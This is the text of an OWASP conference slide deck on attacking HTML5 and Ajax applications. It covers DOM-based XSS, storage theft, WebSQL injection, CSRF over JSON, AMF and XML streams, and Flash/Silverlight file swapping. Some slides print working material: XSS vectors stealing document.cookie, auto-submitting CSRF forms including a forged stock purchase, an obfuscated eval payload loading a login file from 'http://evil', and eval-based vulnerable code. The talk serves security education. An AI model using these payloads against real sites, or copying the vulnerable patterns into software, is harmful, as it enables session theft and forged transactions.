  • 15. Mapping top 10 – Current Context A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL. A2 – XSS : DOM based XSS, Script injection through , Direct third party streams, HTML5 tags A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage A4 – Insecure Direct Object Referencing : Insecure Data Access Level calls from browser. A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing) A6 – Security Misconfiguration : Insecure browsers, poor policies, trust model A7 – Failure to restrict URL Access : Hidden URL and resource-fetching from reverse engineering A8 – Unvalidated Redirects : DOM-based redirects and spoofing A9 – Insecure Crypto Storage : Local storage inside browser and Global variables A10 – Insufficient Transport Layer Protection : Ajax and other calls going over non-SSL channels. Mobile 10 … OWASP 15
  • 16. HTML 5 – TAGS, STORAGE & WEBSQL OWASP 1 16 6
  • 17. Abusing HTML 5 Tags Various new tags and can be abused, may not be filtered or validated Media tags <video poster=javascript:alert(document.cookie)// <audio><source onerror="javascript:alert(document.cookie)"> Form tags <form><button formaction="javascript:alert(document.cookie)">foo <body oninput=alert(document.cookie)><input autofocus> OWASP 17
  • 18. Attacking Storage HTML 5 is having local storage and can hold global scoped variables http://www.w3.org/TR/webstorage/ OWASP 18
  • 19. Attacking Storage It is possible to steal them through XSS or via JavaScript getItem and setItem calls XSS the box and scan through storage OWASP 19
  • 20. DOM Storage Applications run with “rich” DOM JavaScript sets several variables and parameters while loading – GLOBALS It has sensitive information and what if they are GLOBAL and remains during the life of application It can be retrieved with XSS HTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 20
  • 21. What is wrong? OWASP 21
  • 22. By default its Global Here is the line of code temp = "login.do?user="+user+"&pwd="+pwd; xmlhttp.open("GET",temp,true); xmlhttp.onreadystatechange=function() OWASP 22
  • 23. DOM stealing It is possible to get these variables and clear text information – user/pass Responses and tokens Business information XHR calls and HTTP request/responses Dummy XHR object injection Lot of possibilities for exploitation OWASP 23
  • 24. Demo DOMTracer and profiling Accessing username and password OWASP 24
  • 25. SQL Injection WebSQL is part of HTML 5 specification, it provides SQL database to the browser itself. Allows one time data loading and offline browsing capabilities. Causes security concern and potential injection points. Methods and calls are possible OWASP 25
  • 26. SQL Injection Through JavaScript one can harvest entire local database. Example OWASP 26
  • 27. DOM – VULNERABILITIES & EXPLOITS OWASP 27
  • 28. DOM Architecture OWASP 28
  • 29. DOM Calls Ajax/Flash/Silverlight – Async Calls HTML / CSS / RIA Database / Resource JS / DOM XML / Middleware / Text XMLHttpRequest (XHR) Web Server Asynchronous over HTTP(S) OWASP 29
  • 30. DOM Calls JSON XML JS-Script JS-Object JS-Array OWASP 30
  • 31. DOM based XSS It is a sleeping giant in the Ajax applications Root cause DOM is already loaded Application is single page and DOM remains same New information coming needs to be injected in using various DOM calls like eval() Information is coming from untrusted sources OWASP 31
  • 32. Example cases Various different way DOM based XSS can take place Example Simple DOM function using URL to process ajax calls Third party content going into existing DOM and call is not secure Ajax call from application, what if we make a direct call to the link – JSON may cause XSS OWASP 32
  • 33. DOM based URL parsing Ajax applications are already loaded and developers may be using static function to pass arguments from URL For example hu = window.location.search.substring(1); Above parameter is going to following ajax function eval('getProduct('+ koko.toString()+')'); DOM based XSS OWASP 33
  • 34. Demo Scanning with DOMScan Injecting payload in the call OWASP 34
  • 35. Third Party Streaming Documents Attacker News Weather Mails Bank/Trade Browser Internet RSS feeds Ajax RIA (Flash/Silver) Internet App HTML / JS / DOM Blog Database Authentication Stream Application Infrastructure eval() Web Services End point XSS OWASP 35
  • 36. Stream processing if (http.readyState == 4) { var response = http.responseText; var p = eval("(" + response + ")"); document.open(); document.write(p.firstName+"<br>"); document.write(p.lastName+"<br>"); document.write(p.phoneNumbers[0]); document.close(); OWASP 36
  • 37. Polluting Streams XML/ JS-Object / JS-Array / JS-Script / JSON attacker 8008 proxy Web app DB Web Server Web app DB Web app Stream Web Client eval() XSS OWASP 37
  • 38. Exploiting DOM calls document.write(…) document.writeln(…) document.body.innerHtml=… document.forms[0].action=… Example of vulnerable document.attachEvent(…) Calls document.create…(…) document.execCommand(…) document.body. … window.attachEvent(…) document.location=… document.location.hostname=… document.location.replace(…) document.location.assign(…) document.URL=… window.navigate(…) OWASP 38
  • 39. Demo Sample call demo DOMScan to identify vulnerability OWASP 39
  • 40. Direct Ajax Call Ajax function would be making a back-end call Back-end would be returning JSON stream or any other and get injected in DOM In some libraries their content type would allow them to get loaded in browser directly In that case bypassing DOM processing… OWASP 40
  • 41. Demo DWR/JSON call – bypassing and direct stream access OWASP 41
  • 42. ABUSING SOCKETS, XHR & CSRF OWASP 42
  • 43. Abusing network calls HTML 5 provides WebSocket and XHR Level 2 calls It allows to make cross domains call and raw socket capabilities It can be leveraged by JavaScript payload Malware or worm can use it to perform several scanning tasks OWASP 43
  • 44. Internal Scanning Allows internal scanning, setting backward hidden channel, opening calls to proxy/cache. Some browsers have blocked these calls for security reason. OWASP 44
  • 45. XHR/CSRF ETC. OWASP 45
  • 46. XHR – Level 2 calls XHR is now level 2 on browser Various browser behavior is different XHR is already implemented Shared resource policy implemented “orgin” and “access-*” tags and decisions based on that Potential abuses One way stealth channel CSRF possible (no cookie though) Header changes CROS - http://www.w3.org/TR/cors/ (Cross Origin Request Sharing) OWASP 46
  • 47. CSRF CSRF is possible with Web 2.0 streams by abusing DOM calls XML manipulations CSRF with JSON AMX is also XML stream Attacker injects simple HTML payload Initiate a request from browser to target cross domain OWASP 47
  • 48. How it works? OWASP 48
  • 49. JSON <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101/json/jservice.ashx" METHOD="POST"> <input type="hidden" name='{"id":3,"method":"getProduct","params":{ "id" : 3}}' value='foo'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 49
  • 50. HTTP Req. POST /json/jservice.ashx HTTP/1.1 Host: 192.168.100.2 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Content-Type: text/plain Content-Length: 57 {"id":3,"method":"getProduct","params":{ "id" : 3}}=foo OWASP 50
  • 51. HTTP Resp. HTTP/1.1 200 OK Date: Sat, 17 Jul 2010 09:14:44 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/plain; charset=utf-8 Content-Length: 1135 {"id":3,"result":{"Products":{"columns":["product_id","product_name","product_desc_summary","product_desc","product_price","image _path","rebates_file"],"rows":[[3,"Doctor Zhivago","Drama / Romance","David Lean's DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of view of the intellectual, introspective title character (Omar Sharif). As the political landscape changes, and the Czarist regime comes to an end, Dr. Zhivago's relationships reflect the political turmoil raging about him. Though he is married, the vagaries of war lead him to begin a love affair with the beautiful Lara (Julie Christie). But he cannot escape the machinations of a band of selfish and cruel characters: General Strelnikov (Tom Courtenay), a Bolshevik General; Komarovsky (Rod Steiger), Lara's former lover; and Yevgraf (Alec Guinness), Zhivago's sinister half-brother. This epic, sweeping romance, told in flashback, captures the lushness of Moscow before the war and the violent social upheaval that followed. The film is based on the Pulitzer Prize-winning novel by Boris Pasternak.",10.99,"zhivago","zhivago.html"]]}}} OWASP 51
  • 52. AMF <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://192.168.100.101:8080/samples/messagebroker/http" METHOD="POST"> <input type="hidden" name='<amfx ver' value='"3" xmlns="http://www.macromedia.com/2005/amfx"><body><object type="flex.messaging.messages.CommandMessage"><traits><string>body</string ><string>clientId</string><string>correlationId</string><string>destination</strin g><string>headers</string><string>messageId</string><string>operation</string ><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null/><string/><string/><object><traits><string>DSId</string><str ing>DSMessagingVersion</string></traits><string>nil</string><int>1</int></obje ct><string>68AFD7CE-BFE2-4881-E6FD- 694A0148122B</string><int>5</int><int>0</int><int>0</int></object></body> </amfx>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 52
  • 53. XML <html> <body> <FORM NAME="buy" ENCTYPE="text/plain" action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name='<?xml version' value='"1.0"?><methodCall><methodName>stocks.buy</methodN ame><params><param><value><string>MSFT</string></value> </param><param><value><double>26</double></value></para m></params></methodCall>'> </FORM> <script>document.buy.submit();</script> </body> </html> OWASP 53
  • 54. Demos Simple trade demo – XML-RPC call CSRF. OWASP 54
  • 55. FLASHJACKING OWASP 55
  • 56. Flashjacking It is possible to have some integrated attacks DOM based XSS CSRF Flash DOM based issue can change flash/swf file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.swf" OWASP 56
  • 57. Double eval – eval the eval Payload - document.getElementsByName('Login').item(0 ).src='http://192.168.100.200:8080/flex/Login n/Loginn.swf‘ Converting for double eval to inject ‘ and “ etc… eval(String.fromCharCode(100,111,99,117,109,101,110,116,4 6,103,101,116,69,108,101,109,101,110,116,115,66,121,78,97 ,109,101,40,39,76,111,103,105,110,39,41,46,105,116,101,10 9,40,48,41,46,115,114,99,61,39,104,116,116,112,58,47,47,49 ,57,50,46,49,54,56,46,49,48,48,46,50,48,48,58,56,48,56,48,4 7,102,108,101,120,47,76,111,103,105,110,110,47,76,111,103 ,105,110,110,46,115,119,102,39)) OWASP 57
  • 58. silvelightjacking It is possible to have some integrated attacks DOM based XSS CSRF Silvelight files DOM based issue can change xap file – it can be changed at run time – user will not come to know .. Example document.getElementsByName(“login").item(0).src = "http://evil/login.xap" OWASP 58
  • 60. Widgets Widgets/Gadgets/Modules – popular with Web 2.0 applications Small programs runs under browser JavaScript and HTML based components In some cases they share same DOM – Yes, same DOM It can cause a cross widget channels Exploitable … OWASP 60
  • 61. Cross DOM Access Widget 1 Widget 2 Widget 3 Email Widget RSS Feed Reader Attacker DOM – Shared DOM Setting the trap OWASP 61
  • 62. DOM traps It is possible to access DOM events, variables, logic etc. Sandbox is required at the architecture layer to protect cross widget access Segregating DOM by iframe may help Flash based widget is having its own issues as well Code analysis of widgets before allowing them to load OWASP 62
  • 63. Demo Cross Widget Spying Using DOMScan to review Widget Architecture and Access Mechanism RSS Feed Hacking Mashup Hacks Cross Domain Callback Hacking OWASP 63
  • 65. Security at CODE Level JS, Flash or XAP should not have server side logic – should be presentation layer only … Obfuscation may help a bit – not full proof. Source code and object code analysis during blackbox testing would require Resource discoveries and fuzzing – a must for SOAP, JSON and AMF streams Careful with HTML 5 implementation DOM based scanning and analysis is required Cross streams and third party analytics OWASP 65
  • 66. http://shreeraj.blogspot.com shreeraj@blueinfy.com http://www.blueinfy.com CONCLUSION AND QUESTIONS OWASP 66